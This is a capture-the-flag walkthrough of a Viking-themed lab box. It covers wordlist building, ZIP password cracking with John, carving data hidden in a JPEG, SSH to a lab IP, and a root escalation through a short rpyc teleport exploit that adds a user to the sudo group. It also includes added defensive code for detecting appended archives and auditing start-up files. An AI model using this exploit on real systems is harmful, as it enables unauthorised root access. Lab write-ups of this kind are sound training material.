865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)
import re

text = r"865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)"
text_dict = text.split(' ')

# Normalise and deduplicate: strip non-word characters, keep first occurrence only
seen = set()
res = []
for word in text_dict:
    cleaned = re.sub(r'[\W]', '', word)
    if cleaned and cleaned not in seen:
        seen.add(cleaned)
        res.append(cleaned + r'.%EXT%' + '\n')

# Write the dictionary file
with open('text_dict.txt', 'w', encoding='utf-8') as f:
    f.writelines(res)
Cracking: john data --wordlist=/usr/share/wordlists/rockyou.txt
┌──(kali㉿kali)-[~/workspace]
└─$ john data --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (ZIP, WinZip [PBKDF2-SHA1 128/128 SSE2 4x])
Cost 1 (HMAC size) is 1410760 for all loaded hashes
Press 'q' or Ctrl-C to abort, almost any other key for status
ragnarok123 (a.zip/king)
1g 0:00:01:11 DONE (2022-12-01 13:15) 0.01403g/s 4143p/s 4143c/s 4143C/s raihanah..raejean
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The password is ragnarok123.
Extracting the archive yields an image, king.
Note that ragnarok, the stem of the password, is also a name from the text above.
Steganography
Deliberately hidden content like this, especially in images or PDFs, usually involves steganography, so we check with the relevant tools.
┌──(kali㉿kali)-[~/workspace]
└─$ steghide info king
"king":
format: jpeg
capacity: 76.2 KB
Try to get information about embedded data ? (y/n) y
Enter passphrase:
So there is indeed embedded data, but it is protected by a passphrase.
┌──(kali㉿kali)-[~/workspace]
└─$ foremost king 127 ⨯
Processing: king
|foundat=user��wK��/-v�O,I*��II-�O����t(����K/V p���9�▒�'��1W�
*|
Extracting data with foremost creates an output directory under the current directory.
┌──(kali㉿kali)-[~/workspace]
└─$ tree output
output
├── audit.txt
├── jpg
│ └── 00000000.jpg
└── zip
└── 00002792.zip
2 directories, 3 files
audit.txt is the log and can be ignored.
00000000.jpg is the original image.
00002792.zip is the hidden data we need.
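What foremost did above is carve a ZIP archive that had been appended after the end of the JPEG data. The following is an added example, not code from the original writeup, showing how that check works in a few lines: walk the JPEG marker segments to find the real EOI marker, then look for a ZIP local-file-header signature in whatever bytes follow. The sample JPEG and the appended archive are constructed in the code and labelled as such.

```python
import io
import zipfile

JPEG_SOI = b"\xff\xd8"
JPEG_EOI = b"\xff\xd9"
ZIP_LOCAL_HEADER = b"PK\x03\x04"


def jpeg_end_offset(data: bytes) -> int:
    """Walk JPEG marker segments and return the offset just past the EOI marker."""
    if data[:2] != JPEG_SOI:
        raise ValueError("missing SOI marker")
    pos = 2
    while pos + 2 <= len(data):
        if data[pos] != 0xFF:
            raise ValueError(f"expected a marker at offset {pos}")
        marker = data[pos + 1]
        if marker == 0xD9:                       # EOI: end of image
            return pos + 2
        if marker == 0xD8 or 0xD0 <= marker <= 0xD7:  # standalone markers without a length
            pos += 2
            continue
        if pos + 4 > len(data):
            raise ValueError("truncated segment header")
        seg_len = int.from_bytes(data[pos + 2:pos + 4], "big")
        pos += 2 + seg_len
        if marker == 0xDA:                       # SOS: entropy-coded data follows the header
            # Skip until an 0xFF that is neither byte-stuffed (FF00) nor a restart marker
            while pos + 1 < len(data):
                nxt = data[pos + 1]
                if data[pos] == 0xFF and nxt != 0x00 and not (0xD0 <= nxt <= 0xD7):
                    break
                pos += 1
    raise ValueError("no EOI marker found")


def find_appended_archive(data: bytes):
    """Return details of a ZIP appended after the JPEG, or None if the file ends at EOI."""
    end = jpeg_end_offset(data)
    trailer = data[end:]
    if not trailer:
        return None
    zip_off = trailer.find(ZIP_LOCAL_HEADER)
    return {
        "jpeg_end": end,
        "trailing_bytes": len(trailer),
        "zip_offset": end + zip_off if zip_off >= 0 else None,
    }


def appended_archive_names(data: bytes):
    """List the member names of the appended ZIP (empty list if there is none)."""
    info = find_appended_archive(data)
    if not info or info["zip_offset"] is None:
        return []
    with zipfile.ZipFile(io.BytesIO(data[info["zip_offset"]:])) as zf:
        return zf.namelist()


# Constructed sample: a minimal JPEG (SOI, APP0, SOS, a little entropy data, EOI)
SAMPLE_JPEG = (
    JPEG_SOI
    + b"\xff\xe0" + (16).to_bytes(2, "big") + b"JFIF\x00\x01\x01\x00\x00\x01\x00\x01\x00\x00"
    + b"\xff\xda" + (8).to_bytes(2, "big") + b"\x01\x01\x00\x00\x3f\x00"
    + b"\x12\x34\xff\x00\x56\xff\xd0\x78"         # includes a stuffed FF00 and an RST0 marker
    + JPEG_EOI
)

# Constructed sample: the same JPEG with a small ZIP appended, mimicking the carved file
_buf = io.BytesIO()
with zipfile.ZipFile(_buf, "w") as _zf:
    _zf.writestr("user", "constructed sample payload\n")
SAMPLE_WITH_ZIP = SAMPLE_JPEG + _buf.getvalue()

if __name__ == "__main__":
    print(find_appended_archive(SAMPLE_WITH_ZIP))
    print(appended_archive_names(SAMPLE_WITH_ZIP))
```

Parsing the markers rather than searching for the last FF D9 matters because compressed data in the trailer can contain that byte pair by chance; the first EOI reached by walking segments is the true end of the picture, and anything after it is foreign to the image format.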
┌──(kali㉿kali)-[~/workspace]
└─$ unzip output/zip/00002792.zip
Archive: output/zip/00002792.zip
inflating: user
<title>Split</title>
Ivar The Boneless
<h1>Mad King</h1>
865 the Great Heathen Army, led by Ivar, invaded the Anglo-Saxon Heptarchy.The Heptarchy was the collective name for the seven kingdoms East Anglia, Essex, Kent, Mercia, Northumbria, Sussex and Wessex. The invasion was organised by the sons of Ragnar Lodbrok, to wreak revenge against Ælla of Northumbria who had supposedly executed Ragnar in 865 by throwing him in a snake pit, but the historicity of this explanation is unknown.According to the saga, Ivar did not overcome Ælla and sought reconciliation. He asked for only as much land as he could cover with an ox's hide and swore never to wage war against Ælla. Then Ivar cut the ox's hide into such fine strands that he could envelop a large fortress (in an older saga it was York and according to a younger saga it was London), which he could take as his own. (Compare the similar legendary ploy of Dido.)
┌──(kali㉿kali)-[~]
└─$ ssh floki@192.168.56.120
The authenticity of host '192.168.56.120 (192.168.56.120)' can't be established.
ED25519 key fingerprint is SHA256:volom5GRMcetvgfJsyVTXVnNY0FUA6W1k/5fsdHs9T4.
This key is not known by any other names
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '192.168.56.120' (ED25519) to the list of known hosts.
floki@192.168.56.120's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Dec 2 01:49:58 UTC 2022
System load: 0.23 Processes: 98
Usage of /: 52.0% of 8.79GB Users logged in: 0
Memory usage: 18% IP address for enp0s3: 192.168.56.120
Swap usage: 0%
0 updates can be applied immediately.
You have mail.
Last login: Sat Sep 4 04:38:04 2021 from 10.42.0.1
floki@vikings:~$ id
uid=1000(floki) gid=1000(floki) groups=1000(floki),4(adm),24(cdrom),30(dip),46(plugdev),108(lxd)
Attempting privilege escalation
First, look at what is in the current directory.
floki@vikings:~$ ls
boat readme.txt
floki@vikings:~$ cat boat
#Printable chars are your ally.
#num = 29th prime-number.
collatz-conjecture(num)
floki@vikings:~$ cat readme.txt
_______________________________________________________________________Floki-Creation____________________________________________________________________________________________________
I am the famous boat builder Floki. We raided Paris this with our all might yet we failed. We don't know where Ragnar is after the war. He is in so grief right now. I want to apologise to him.
Because it was I who was leading all the Vikings. I need to find him. He can be anywhere.
I need to create this `boat` to find Ragnar
#Printable chars are your ally.
#num = 29th prime-number.
collatz-conjecture(num)
num is the 29th prime.
collatz-conjecture refers to the Collatz conjecture from mathematics.
The output has to consist of printable characters.
Write the code; remember you can split the terminal with ctrl+shift+D.
import math

# Collect primes up to 10000 by trial division (index 28 is the 29th prime)
prime = []
for i in range(2, 10000):
    if i == 2:
        prime.append(i)
    else:
        for j in range(2, int(math.sqrt(i)) + 1):
            if i % j == 0:
                break
        else:  # no divisor found, so i is prime
            prime.append(i)

num = prime[28]  # the 29th prime

# Walk the Collatz sequence from num and print every term that is a printable ASCII code
while num != 1:
    if 0x20 <= num <= 0x7E:
        print(chr(num), end='')
    if num % 2 == 1:
        num = 3 * num + 1
    else:
        num //= 2
print()
$ ls -lah
total 48K
drwxr-xr-x 5 floki floki 4.0K Sep 4 2021 .
drwxr-xr-x 4 root root 4.0K Sep 3 2021 ..
lrwxrwxrwx 1 root root 9 Sep 3 2021 .bash_history -> /dev/null
-rw-r--r-- 1 floki floki 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 floki floki 3.7K Apr 4 2018 .bashrc
-rw-r--r-- 1 floki floki 82 Oct 11 2020 boat
drwx------ 2 floki floki 4.0K Sep 3 2021 .cache
drwx------ 3 floki floki 4.0K Sep 3 2021 .gnupg
drwxrwxr-x 3 floki floki 4.0K Sep 3 2021 .local
-rw-r--r-- 1 floki floki 806 Sep 4 2021 .profile
-rw-r--r-- 1 floki floki 516 Oct 11 2020 readme.txt
-rw-rw-r-- 1 floki floki 66 Sep 3 2021 .selected_editor
-rw-r--r-- 1 floki floki 0 Sep 3 2021 .sudo_as_admin_successful
-rw------- 1 floki floki 897 Sep 4 2021 .viminfo
$ ls
boat readme.txt
$ cat boat
#Printable chars are your ally.
#num = 29th prime-number.
collatz-conjecture(num)
$ cat readme.txt
_______________________________________________________________________Floki-Creation____________________________________________________________________________________________________
I am the famous boat builder Floki. We raided Paris this with our all might yet we failed. We don't know where Ragnar is after the war. He is in so grief right now. I want to apologise to him.
Because it was I who was leading all the Vikings. I need to find him. He can be anywhere.
I need to create this `boat` to find Ragnar
$
This looks much like the floki account, but there is nothing of value here.
There was a prompt for input right at login, which means some script runs automatically. Also, floki gets bash while ragnar gets sh, which is clearly odd. Bash has a login start-up mechanism, so that script at login is probably related to it.
So we should look at .bashrc and .profile, which is where programs auto-started by bash are usually configured.
$ cat .profile
# ~/.profile: executed by the command interpreter for login shells.
# This file is not read by bash(1), if ~/.bash_profile or ~/.bash_login
# exists.
# see /usr/share/doc/bash/examples/startup-files for examples.
# the files are located in the bash-doc package.
# the default umask is set in /etc/profile; for setting the umask
# for ssh logins, install and configure the libpam-umask package.
#umask 022
sudo python3 /usr/local/bin/rpyc_classic.py
# if running bash
if [ -n "$BASH_VERSION" ]; then
# include .bashrc if it exists
if [ -f "$HOME/.bashrc" ]; then
. "$HOME/.bashrc"
fi
fi
# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/bin" ] ; then
PATH="$HOME/bin:$PATH"
fi
# set PATH so it includes user's private bin if it exists
if [ -d "$HOME/.local/bin" ] ; then
PATH="$HOME/.local/bin:$PATH"
fi
$
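From a defender's point of view, the line sudo python3 /usr/local/bin/rpyc_classic.py in .profile is the whole problem: a privileged service is launched from a user's shell start-up file, and an rpyc classic server accepts code from any client that can reach it. The following is an added example, not part of the original writeup, that audits shell start-up files for privileged commands and parses ss -pantu style output for a listener on rpyc's default port 18812. Both inputs are constructed samples modelled on the listing above; the Finding class and function names are this example's own.

```python
import re
from dataclasses import dataclass, field

RPYC_DEFAULT_PORT = 18812

# Constructed sample: the shape of the .profile seen above, not a copy of the real file
SAMPLE_PROFILE = """\
# ~/.profile: executed by the command interpreter for login shells.
#umask 022
sudo python3 /usr/local/bin/rpyc_classic.py
if [ -n "$BASH_VERSION" ]; then
    . "$HOME/.bashrc"
fi
PATH="$HOME/bin:$PATH"
"""

# Constructed sample in the column layout of `ss -pantu`
SAMPLE_SS = """\
Netid State  Recv-Q Send-Q Local Address:Port Peer Address:Port Process
tcp   LISTEN 0      1      127.0.0.1:18812   0.0.0.0:*   users:(("python3",pid=1234,fd=3))
tcp   LISTEN 0      128    0.0.0.0:22        0.0.0.0:*   users:(("sshd",pid=800,fd=3))
"""


@dataclass
class Finding:
    source: str
    line_no: int
    text: str
    reasons: list = field(default_factory=list)


def audit_startup_file(name: str, content: str):
    """Flag lines in a shell start-up file that escalate privilege or start an rpyc server."""
    findings = []
    for no, raw in enumerate(content.splitlines(), 1):
        line = raw.strip()
        if not line or line.startswith("#"):
            continue
        reasons = []
        if re.match(r"^(sudo|su)\b", line):
            reasons.append("privileged command in shell start-up file")
        if "rpyc" in line:
            reasons.append("rpyc server launched at login (unauthenticated remote code execution)")
        if reasons:
            findings.append(Finding(name, no, line, reasons))
    return findings


def listening_sockets(ss_output: str):
    """Parse LISTEN rows of ss output into (port, process name) tuples."""
    rows = []
    for line in ss_output.splitlines()[1:]:       # skip the header row
        parts = line.split()
        if len(parts) < 5 or parts[1] != "LISTEN":
            continue
        port = int(parts[4].rsplit(":", 1)[1])
        m = re.search(r'"([^"]+)"', line)
        rows.append((port, m.group(1) if m else "?"))
    return rows


def flag_rpyc_listeners(ss_output: str):
    """Return listeners bound to rpyc's default port, whoever owns them."""
    return [row for row in listening_sockets(ss_output) if row[0] == RPYC_DEFAULT_PORT]


if __name__ == "__main__":
    for f in audit_startup_file("~/.profile", SAMPLE_PROFILE):
        print(f"{f.source}:{f.line_no}: {f.text}  <- {'; '.join(f.reasons)}")
    print(flag_rpyc_listeners(SAMPLE_SS))
```

In a real audit the same two checks would run over every user's .profile, .bashrc and .bash_profile and over live ss output; the fix on this box would be to stop launching the server from a login file and, if rpyc is needed at all, to run it as an unprivileged account rather than through sudo.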
The following code runs on the target and sends a request to the rpyc server; the Python program started by sudo in .profile above is that rpyc server, so it runs as root, and conn.teleport(shell) ships our function into the server process, where it adds ragnar to the sudo group. If you are unfamiliar with rpyc, look it up on Baidu.
import rpyc

def shell():
    # Executes inside the rpyc server process, which .profile launched with sudo
    import os
    os.system('sudo usermod -a -G sudo ragnar')

conn = rpyc.classic.connect('localhost')
fn = conn.teleport(shell)  # send the function to the server side
fn()
First confirm with ss -pantu | grep 18812 that the port is open, then run exp.py and log in again (the new group membership only applies to a fresh login).
ragnar@vikings:~$ python3 exp.py
ragnar@vikings:~$ sudo su root
[sudo] password for ragnar:
Sorry, try again.
[sudo] password for ragnar:
sudo: 1 incorrect password attempt
ragnar@vikings:~$ exit
exit
$ exit
Connection to 192.168.56.120 closed.
┌──(kali㉿kali)-[~]
└─$ ssh ragnar@192.168.56.120 1 ⨯
ragnar@192.168.56.120's password:
Permission denied, please try again.
ragnar@192.168.56.120's password:
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-154-generic x86_64)
* Documentation: https://help.ubuntu.com
* Management: https://landscape.canonical.com
* Support: https://ubuntu.com/advantage
System information as of Fri Dec 2 03:20:13 UTC 2022
System load: 0.0 Processes: 95
Usage of /: 52.3% of 8.79GB Users logged in: 0
Memory usage: 18% IP address for enp0s3: 192.168.56.120
Swap usage: 0%
0 updates can be applied immediately.
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Fri Dec 2 02:56:08 2022 from 192.168.56.116
[sudo] password for ragnar:
Traceback (most recent call last):
File "/usr/local/bin/rpyc_classic.py", line 130, in <module>
ClassicServer.run()
File "/usr/local/lib/python3.6/dist-packages/plumbum/cli/application.py", line 609, in run
retcode = inst.main(*tailargs)
File "/usr/local/bin/rpyc_classic.py", line 89, in main
self._serve_mode(ThreadedServer)
File "/usr/local/bin/rpyc_classic.py", line 100, in _serve_mode
registrar=self.registrar, auto_register=self.auto_register)
File "/usr/local/lib/python3.6/dist-packages/rpyc/utils/server.py", line 90, in __init__
self.listener.bind(address)
OSError: [Errno 98] Address already in use
$ bash -i
ragnar@vikings:~$ sudo -s
# id
uid=0(root) gid=0(root) groups=0(root)